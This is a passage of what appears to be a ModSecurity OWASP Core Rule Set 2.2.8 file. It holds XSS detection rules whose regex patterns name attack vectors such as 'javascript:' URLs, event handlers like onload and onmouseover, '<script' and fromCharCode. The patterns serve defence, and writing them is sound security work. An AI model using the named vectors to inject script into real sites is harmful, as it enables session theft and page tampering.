%{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bhref\b\W*?\bjavascript:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958018',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonchange\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958406',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\btype\b\W*?\btext\b\W*?\bjscript\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958040',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\balert\b\W*?\(" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958052',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\btype\b\W*?\bapplication\b\W*?\bx-vbscript\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958037',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\< ?meta\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958049',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bsrc\b\W*?\bhttp:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958030',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\btype\b\W*?\btext\b\W*?\bvbscript\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958041',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonmouseout\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958416',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\blowsrc\b\W*?\bshell:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958024',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\basfunction:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958059',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonmouseover\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958417',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bhref\b\W*?\bvbscript:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958020',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\burl\b\W*?\bjavascript:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958045',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\.innerhtml\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958004',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonselect\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958421',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\@import\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958009',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\blowsrc\b\W*?\bvbscript:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958025',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonload\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958413',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\< ?script\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958051',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonresize\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958420',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonclick\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958407',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\biframe\b.{0,100}?\bsrc\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958056',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bbackground-image:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958011',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonkeyup\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958412',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "<input\b.*?\btype\b\W*?\bimage\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958008',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\burl\b\W*?\bshell:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958046',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\btype\b\W*?\btext\b\W*?\bjavascript\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958039',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\.fromcharcode\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) 